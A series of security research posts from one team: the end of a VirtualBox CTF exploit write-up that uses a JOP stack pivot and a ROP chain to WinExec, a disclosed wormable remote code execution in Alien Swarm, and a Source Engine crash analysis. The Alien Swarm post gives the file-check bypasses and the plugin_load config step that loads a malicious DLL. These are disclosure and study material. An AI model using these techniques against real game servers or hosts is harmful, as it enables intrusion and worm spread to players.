JOP requires some kind of register control, but at the point at which our callback is invoked we only control a single register, r8. An additional constraint is that since we only leaked a pointer from VBoxC.dll we’re limited to JOP gadgets within that library. Our goal for this JOP chain is to perform a stack pivot into some memory on the heap where we will place a ROP chain that will do the heavy lifting and eventually pop a calc.

Sounds easy enough, let’s see what we can come up with :P

Our first issue is that we need to find some memory area where we can put the JOP data. Since our OOB write only allows us to write to the heap, that’ll have to do. But we can’t just go around writing stuff to the heap because that will most likely corrupt some heap metadata, or newly allocated objects will corrupt us. So we need to get a buffer allocated first and write to that. We can abuse the pszPatterns field in our spray for that. If we extend the pattern size to 0x70 bytes and place a known magic value in the first quad-word, we can use the OOB read to find that magic on the heap and overwrite the remaining 0x68 bytes with our payload. We’re the ones who allocated that string so it won’t get free’d randomly so long as we hold a reference to it and since we already leaked a heap address, we’re also able to calculate the address of our string and can use it in the JOP chain.

After spending ~30min straight reading through VBoxC.dll assembly together with localo, we finally came up with a way to get from r8 control to rsp control. I had trouble figuring out a way to describe the JOP chain, so css wizard localo created an interactive visualization in order to make following the chain easier. To simplify things even further, the visualization will show all registers with uncontrolled contents as XXX and any reading or uncontrolled writing operations to or from those registers will be ignored.

Let’s assume the JOP payload in our string is located at 0x1230 and r8 points to it. We trigger the callback, which will execute the jmp [r8+0x10]. You can click through the slides to understand what happens:

We managed to get rsp to point into our string and the next ret will kickstart ROP execution. From this point on, it’s just a matter of crafting a textbook WinExec("calc\x00") ROP-chain. But for the sake of completeness I’ll mention the gist of it. First, we read the address of a symbol from VBoxC.dll’s IAT. The IAT is comparable to a global offset table on linux and contains pointers to dynamically linked library symbols. We’ll use this to leak a pointer into kernel32.dll. Then we can calculate the runtime address of WinExec() in kernel32.dll, set rcx to point to "calc\x00" and call WinExec which will pop a calculator.

However there is a little twist to this. A keen eye might have noticed that we set rbp to 0x10000000 and that we are using a leave; jmp rax gadget to get to WinExec in rop_gadget_5 instead of just a simple jmp rax. That is because we were experiencing some major issues with stack alignment and stack frame size when directly calling WinExec with the stack pointer still pointing into our heap payload. It turns out, that WinExec sets up a rather large stack frame and the distance between out fake stack and the start of the heap isn’t always large enough to contain it. Therefore we were getting paging issues. Luckily, 0x4d5a and localo knew from reading this blog post about the vram section which has weak randomisation and it turns out that the range from 0xcb10000 to 0x13220000 is always mapped by that section. So if we set rbp to 0x10000000 and call a leave; jmp rax it will set the stack pointer to 0x10000000 before calling WinExec and thereby giving it enough space to do all the stack setup it likes ;)

Demo

‘nuff said! Here’s the demo:

You can find this version of our exploit here.

Credits

Writing this exploit was a joint effort of a bunch of people.

  • ESPR’s spq, tsuro and malle who don’t need an introduction :D

  • My ALLES! teammates and Windows experts Alain Rödel aka 0x4d5a and Felipe Custodio Romero aka localo

  • niklasb for his prior work and for some helpful pointers!

“A ROP chain a day keeps the doctor away. Immer dran denken, hat mein Opa immer gesagt.”

~ Niklas Baumstark (2021)

  • myself, Ilias Morad aka A2nkF :)

I had the pleasure of working with this group of talented people over the course of multiple sleepless nights and days during and even after the CTF was already over just to get the exploit working properly on a release build of VirtualBox and to improve stability. This truly shows what a small group of dedicated people is able to achieve in an incredibly short period of time if they put their minds to it! I’d like to thank every single one of you :D

Conclusion

This was my first time working with VirtualBox so it was a very educational and fun exercise. We managed to write a working exploit for a debug build of virtual box with 3h left in the CTF but sadly, we weren’t able to port it to a release build in time for the CTF due to anti-debugging in VirtualBox which made figuring out what exactly was breaking very hard. The next day we rebuilt VirtualBox without the anti-debugging/process hardening and finally properly ported the exploit to work with the latest release build of VirtualBox. We recommend you disable SCSI on your VirtualBox until this bug is patched.

The Organizers even agreed to demo our exploit in a live stream on their twitch channel afterwards and after some offset issues we finally got everything working!

I’d like to thank ChenNan again for creating the challenge and RealWorld CTF for being the excellent CTF we all grew to love. I’m looking forward to next years edition, where we hopefully will have an on-site finale in China again :).

This exploit was assigned CVE-2021-2119.

Part two…

This was the initial version of our exploit and it turned out to have a couple of issues which caused it to be a little fragile and somewhat unreliable. After the CTF was over we got together once more and attempted to identify and mitigate these weaknesses. localo will explain these issues and our workarounds in part two of this post (coming soon!).

Stay safe and happy pwning!

Wormable remote code execution in Alien Swarm

By: mev
30 October 2020 at 23:00

Alien Swarm was originally a free game released circa July 2010. It differs from most Source Engine games in that it is a top-down shooter, though with gameplay elements not dissimilar from Left 4 Dead. Fallen to the wayside, a small but dedicated community has expanded the game with Alien Swarm: Reactive Drop. The game averages about 800 users per day at peak, and is still actively updated.

Over a decade ago, multiple logic bugs in Source and GoldSrc titles allowed execution of arbitrary code from client to server, and vice-versa, allowing plugins to be stolen or arbitrary data to be written from client to server, or the reverse. We’ll be exploring a modern-day example of this, in Alien Swarm: Reactive Drop.

Client <-> Server file upload

Any Alien Swarm client can upload files to the game server (and vice versa) using the CNetChan->SendFile API, although with some questionable constraints: a client-side check in the game prevents the server from uploading files of certain extensions such as .dll, .cfg:

if ( (!(*(unsigned __int8 (__thiscall **)(int, char *, _DWORD))(*(_DWORD *)(dword_104153C8 + 4) + 40))(
         dword_104153C8 + 4,
         filename,
         0)
   || should_redownload_file((int)filename))
  && !strstr(filename, "//")
  && !strstr(filename, "\\\\")
  && !strstr(filename, ":")
  && !strstr(filename, "lua/")
  && !strstr(filename, "gamemodes/")
  && !strstr(filename, "addons/")
  && !strstr(filename, "..")
  && CNetChan::IsValidFileForTransfer(filename) ) // fails if filename ends with ".dll" and more
{ /* accept file */ }
bool CNetChan::IsValidFileForTransfer( const char *input_path )
{
    char fixed_slashes[260];

    if (!input_path || !input_path[0])
        return false;

    int l = strlen(input_path);
    if (l >= sizeof(fixed_slashes))
        return false;

    strncpy(fixed_slashes, input_path, sizeof(fixed_slashes));
    FixSlashes(fixed_slashes, '/');
    if (fixed_slashes[l-1] == '/')
        return false;

    if (
        stristr(input_path, "lua/")
        || stristr(input_path, "gamemodes/")
        || stristr(input_path, "scripts/")
        || stristr(input_path, "addons/")
        || stristr(input_path, "cfg/")
        || stristr(input_path, "~/")
        || stristr(input_path, "gamemodes.txt")
        )
        return false;

    const char *ext = strrchr(input_path, '.');
    if (!ext)
        return false;

    int ext_len = strlen(ext);
    if (ext_len > 4 || ext_len < 3)
        return false;

    const char *check = ext;
    while (*check)
    {
        if (isspace(*check))
            return false;

        ++check;
    }

    if (!stricmp(ext, ".cfg") ||
        !stricmp(ext, ".lst") ||
        !stricmp(ext, ".lmp") ||
        !stricmp(ext, ".exe") ||
        !stricmp(ext, ".vbs") ||
        !stricmp(ext, ".com") ||
        !stricmp(ext, ".bat") ||
        !stricmp(ext, ".dll") ||
        !stricmp(ext, ".ini") ||
        !stricmp(ext, ".log") ||
        !stricmp(ext, ".lua") ||
        !stricmp(ext, ".nut") ||
        !stricmp(ext, ".vdf") ||
        !stricmp(ext, ".smx") ||
        !stricmp(ext, ".gcf") ||
        !stricmp(ext, ".sys"))
        return false;

    return true;
}

Bypassing "//" and ".." can be done with "/\\" because there is a call to FixSlashes that makes proper slashes after the sanity check, and for the ".." the "/\\" will set the path to the root of the drive, so we can write to anywhere on the system if we know the path. Bypassing "lua/", "gamemodes/" and "addons/" can be done by using capital letters e.g. "ADDONS/" since file paths are not case sensitive on Windows.

Bypassing the file extension check is a bit more tricky, so let’s look at the structure sent by SendFile called dataFragments_t:

typedef struct dataFragments_s
{
    FileHandle_t    file;                 // open file handle
    char            filename[260];        // filename
    char*           buffer;               // if NULL it's a file
    unsigned int    bytes;                // size in bytes
    unsigned int    bits;                 // size in bits
    unsigned int    transferID;           // only for files
    bool            isCompressed;         // true if data is bzip compressed
    unsigned int    nUncompressedSize;    // full size in bytes
    bool            isReplayDemo;         // if it's a file, is it a replay .dem file?
    int             numFragments;         // number of total fragments
    int             ackedFragments;       // number of fragments send & acknowledged
    int             pendingFragments;     // number of fragments send, but not acknowledged yet
} dataFragments_t;

The 260 bytes name buffer in dataFragments_t is used for the file name checks and filters, but is later copied and then truncated to 256 bytes after all the sanity checks thus removing our fake extension and activating the malicious extension:

Q_strncpy( rc->gamePath, gamePath, BufferSize /* BufferSize = 256 */ );

Using a file name such as ./././(...)/file.dll.txt (pad to max length with ./) would get truncated to ./././(...)/file.dll on the receiving end after checking if the file extension is valid. This also has the side effect that we can overwrite files as the file exists check is done before the file extension truncation.

Remote code execution

Using the aforementioned remote file inclusion, we can upload Source Engine config files which have the potential to execute arbitrary code. Using Procmon, I discovered that the game engine searches for the config file in both platform/cfg and swarm/cfg respectively:

procmon

We can simply upload a malicious plugin and config file to platform/cfg and hijack the server. This is due to the fact that the Source Engine server config has the capability to load plugins with the plugin_load command:

plugin_load addons/alien_swarm_exploit.dll

This will load our dynamic library into the game server application, granting arbitrary code execution. The only constraint is that the newmapsettings.cfg config file is only reloaded on map change, so you will have to wait till the end of a game.

Wormable demonstration

Since both of these exploits apply to both the server and the client, we can infect a server, which can infect all players, which can carry on the virus when playing other servers. This makes this exploit chain completely wormable and nothing but a complete shutdown of the game servers can fix it.

Timeline

  • [2020-05-12] Reported to Valve on HackerOne
  • [2020-05-13] Triaged by Valve: “Looking into it!”
  • [2020-08-03] Patched in beta branch
  • [2020-08-18] Patched in release

Source Engine Memory Corruption via LUMP_PAKFILE

By: impost0r
5 May 2020 at 23:00

A month or so ago I dropped a Source engine zero-day on Twitter without much explanation of what it does. After determining that it’s unfortunately not exploitable, we’ll be exploring it, and the mess that is Valve’s Source Engine.

History

Valve’s Source Engine was released initially on June 2004, with the first game utilizing the engine being Counter-Strike: Source, which was released itself on November 1, 2004 - 15 or so years ago. Despite being touted as a “complete rewrite” Source still inherits code from GoldSrc and it’s parent, the Quake Engine. Alongside the possibility of grandfathering in bugs from GoldSrc and Quake (GoldSrc itself a victim of this), Valve’s security model for the engine is… non-existent. Valve not yet being the powerhouse they are today, but we’re left with numerous stupid fucking mistakes, dude, including designing your own memory allocator (or rather, making a wrapper around malloc.).

Of note - it’s relatively common for games to develop their own allocator, but from a security perspective it’s still not the greatest.

The Bug

The byte at offset A47B98 in the .bsp file I released and the following three bytes (\x90\x90\x90\x90), parsed as UInt32, controls how much memory is allocated as the .bsp is being loaded, namely in CS:GO (though also affecting CS:S, TF2, and L4D2). That’s the short of it.

To understand more, we’re going to have to delve deeper. Recently the source code for CS:GO circa 2017’s Operation Hydra was released - this will be our main tool.

Let’s start with WinDBG. csgo.exe loaded with the arguments -safe -novid -nosound +map exploit.bsp, we hit our first chance exception at “Host_NewGame”.

---- Host_NewGame ----
(311c.4ab0): Break instruction exception - code 80000003 (first chance)
*** WARNING: Unable to verify checksum for C:\Users\triaz\Desktop\game\bin\tier0.dll
eax=00000001 ebx=00000000 ecx=7b324750 edx=00000000 esi=90909090 edi=7b324750
eip=7b2dd35c esp=012fcd68 ebp=012fce6c iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
tier0!CStdMemAlloc::SetCRTAllocFailed+0x1c:
7b2dd35c cc              int     3

On the register $esi we can see the four responsible bytes, and if we peek at the stack pointer –

Full stack trace removed for succinctness.

              
00 012fce6c 7b2dac51 90909090 90909090 012fd0c0 tier0!CStdMemAlloc::SetCRTAllocFailed+0x1c [cstrike15_src\tier0\memstd.cpp @ 2880] 
01 (Inline) -------- -------- -------- -------- tier0!CStdMemAlloc::InternalAlloc+0x12c [cstrike15_src\tier0\memstd.cpp @ 2043] 
02 012fce84 77643546 00000000 00000000 00000000 tier0!CStdMemAlloc::Alloc+0x131 [cstrike15_src\tier0\memstd.cpp @ 2237] 
03 (Inline) -------- -------- -------- -------- filesystem_stdio!IMemAlloc::IndirectAlloc+0x8 [cstrike15_src\public\tier0\memalloc.h @ 135] 
04 (Inline) -------- -------- -------- -------- filesystem_stdio!MemAlloc_Alloc+0xd [cstrike15_src\public\tier0\memalloc.h @ 258] 
05 (Inline) -------- -------- -------- -------- filesystem_stdio!CUtlMemory<unsigned char,int>::Init+0x44 [cstrike15_src\public\tier1\utlmemory.h @ 502] 
06 012fce98 7762c6ee 00000000 90909090 00000000 filesystem_stdio!CUtlBuffer::CUtlBuffer+0x66 [cstrike15_src\tier1\utlbuffer.cpp @ 201]

Or, in a more succinct form -

0:000> dds esp
012fcd68  90909090

The bytes of $esi are directly on the stack pointer (duh). A wonderful start. Keep in mind that module - filesystem_stdio — it’ll be important later. If we continue debugging —

***** OUT OF MEMORY! attempted allocation size: 2425393296 ****
(311c.4ab0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000032 ebx=03128f00 ecx=012fd0c0 edx=00000001 esi=012fd0c0 edi=00000000
eip=00000032 esp=012fce7c ebp=012fce88 iopl=0         nv up ei ng nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010292
00000032 ??              ???

And there we see it - the memory allocator has tried to allocate 0x90909090, as UInt32. Now while I simply used HxD to validate this, the following Python 2.7 one-liner should also function.

print int('0x90909090', 0)

(For Python 3, you’ll have to encapsulate everything from int onward in that line in another set of parentheses. RTFM.)

Which will return 2425393296, the value Source’s spaghetti code tried to allocate. (It seems, internally, Python’s int handles integers much the same way as ctypes.c_uint32 - for simplicity’s sake, we used int, but you can easily import ctypes and replicate the finding. Might want to do it with 2.7, as 3 handles some things oddly with characters, bytes, etc.)

So let’s delve a bit deeper, shall we? We would be using macOS for the next part, love it or hate it, as everyone who writes cross-platform code for the platform (and Darwin in general) seems to forget that stripping binaries is a thing - we don’t have symbols for NT, so macOS should be a viable substitute - but hey, we have the damn source code, so we can do this on Windows.

Minimization

One important thing to do before we go fully into exploitation is minimize the bug. The bug is a derivative of one found with a wrapper around zzuf, that was re-found with CERT’s BFF tool. If we look at the differences between our original map (cs_assault) and ours, we can see the differences are numerous.

Diff between files

Minimization was done manually in this case, using BSPInfo and extracting and comparing the lumps. As expected, the key error was in lump 40 - LUMP_PAKFILE. This lump is essentially a large .zip file. We can use 010 Editor’s ZIP file template to examine it.

Symbols and Source (Code)

The behavior between the Steam release and the leaked source will differ significantly.

No bug will function in a completely identical way across platforms. Assuming your goal is to weaponize this, or even get the maximum payout from Valve on H1, your main target should be Win32 - though other platforms are a viable substitute. Linux has some great tooling available and Valve regularly forgets strip is a thing on macOS (so do many other developers).

We can look at the stack trace provided by WinDBG to ascertain what’s going on.

WinDBG Stack Trace

Starting from frame 8, we’ll walk through what’s happening.

The first line of each snippet will denote where WinDBG decides the problem is.

		if ( pf->Prepare( packfile->filelen, packfile->fileofs ) )
		{
			int nIndex;
			if ( addType == PATH_ADD_TO_TAIL )
			{
				nIndex = m_SearchPaths.AddToTail();	
			}
			else
			{
				nIndex = m_SearchPaths.AddToHead();	
			}

			CSearchPath *sp = &m_SearchPaths[ nIndex ];

			sp->SetPackFile( pf );
			sp->m_storeId = g_iNextSearchPathID++;
			sp->SetPath( g_PathIDTable.AddString( newPath ) );
			sp->m_pPathIDInfo = FindOrAddPathIDInfo( g_PathIDTable.AddString( pPathID ), -1 );

			if ( IsDvdDevPathString( newPath ) )
			{
				sp->m_bIsDvdDevPath = true;
			}

			pf->SetPath( sp->GetPath() );
			pf->m_lPackFileTime = GetFileTime( newPath );

			Trace_FClose( pf->m_hPackFileHandleFS );
			pf->m_hPackFileHandleFS = NULL;

			//pf->m_PackFileID = m_FileTracker2.NotePackFileOpened( pPath, pPathID, packfile->filelen );
			m_ZipFiles.AddToTail( pf );
		}
		else
		{
			delete pf;
		}
	}
}

It’s worth noting that you’re reading this correctly - LUMP_PAKFILE is simply an embedded ZIP file. There’s nothing too much of consequence here - just pointing out m_ZipFiles does indeed refer to the familiar archival format.

Frame 7 is where we start to see what’s going on.

	zipDirBuff.EnsureCapacity( rec.centralDirectorySize );
	zipDirBuff.ActivateByteSwapping( IsX360() || IsPS3() );
	ReadFromPack( -1, zipDirBuff.Base(), -1, rec.centralDirectorySize, rec.startOfCentralDirOffset );
	zipDirBuff.SeekPut( CUtlBuffer::SEEK_HEAD, rec.centralDirectorySize );

If one is to open LUMP_PAKFILE in 010 Editor and parse the file as a ZIP file, you’ll see the following.

010 Editor viewing LUMP_PAKFILE as Zipfile

elDirectorySize is our rec.centralDirectorySize, in this case. Skipping forward a frame, we can see the following.

Commented out lines highlight lines of interest.

CUtlBuffer::CUtlBuffer( int growSize, int initSize, int nFlags ) : 
	m_Error(0)
{
	MEM_ALLOC_CREDIT();
	m_Memory.Init( growSize, initSize );
	m_Get = 0;
	m_Put = 0;
	m_nTab = 0;
	m_nOffset = 0;
	m_Flags = nFlags;
	if ( (initSize != 0) && !IsReadOnly() )
	{
		m_nMaxPut = -1;
		AddNullTermination( m_Put );
	}
	else
	{
		m_nMaxPut = 0;
	}
	...

followed by the next frame,

template< class T, class I >
void CUtlMemory<T,I>::Init( int nGrowSize /*= 0*/, int nInitSize /*= 0*/ )
{
	Purge();

	m_nGrowSize = nGrowSize;
	m_nAllocationCount = nInitSize;
	ValidateGrowSize();
	Assert( nGrowSize >= 0 );
	if (m_nAllocationCount)
	{
		UTLMEMORY_TRACK_ALLOC();
		MEM_ALLOC_CREDIT_CLASS();
		m_pMemory = (T*)malloc( m_nAllocationCount * sizeof(T) );
	}
}

and finally,

inline void *MemAlloc_Alloc( size_t nSize )
{ 
	return g_pMemAlloc->IndirectAlloc( nSize );
}

where nSize is the value we control, or $esi. Keep in mind, this is all before the actual segfault and $eip corruption. Skipping ahead to that –

***** OUT OF MEMORY! attempted allocation size: 2425393296 ****
(311c.4ab0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000032 ebx=03128f00 ecx=012fd0c0 edx=00000001 esi=012fd0c0 edi=00000000
eip=00000032 esp=012fce7c ebp=012fce88 iopl=0         nv up ei ng nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010292
00000032 ??              ???

We’re brought to the same familiar fault. Of note is that $eax and $eip are the same value, and consistent throughout runs. If we look at the stack trace WinDBG provides, we see much of the same.

WinDBG Stack Trace

Picking apart the locals from CZipPackFile::Prepare, we can see the values on $eip and $eax repeated a few times. Namely, the tuple m_PutOverflowFunc.

m_PutOverflowFunc

So we’re able to corrupt this variable and as such, control $eax and $eip - but not to any useful extent, unfortunately. These values more or less seem arbitrary based on game version and map data. What we have, essentially - is a malloc with the value of nSize (0x90909090) with full control over the variable nSize. However, it doesn’t check if it returns a valid pointer – so the game just segfaults as we’re attempting to allocate 2 GB of memory (and returning zero.) In the end, we have a novel denial of service that does result in “control” of the instruction pointer - though not to an extent that we can pop a shell, calc, or do anything fun with it.

Thanks to mev for phrasing this better than I could.

I’d like to thank mev, another one of our members, for assisting with this writeup, alongside paracord and vmcall.

❌
❌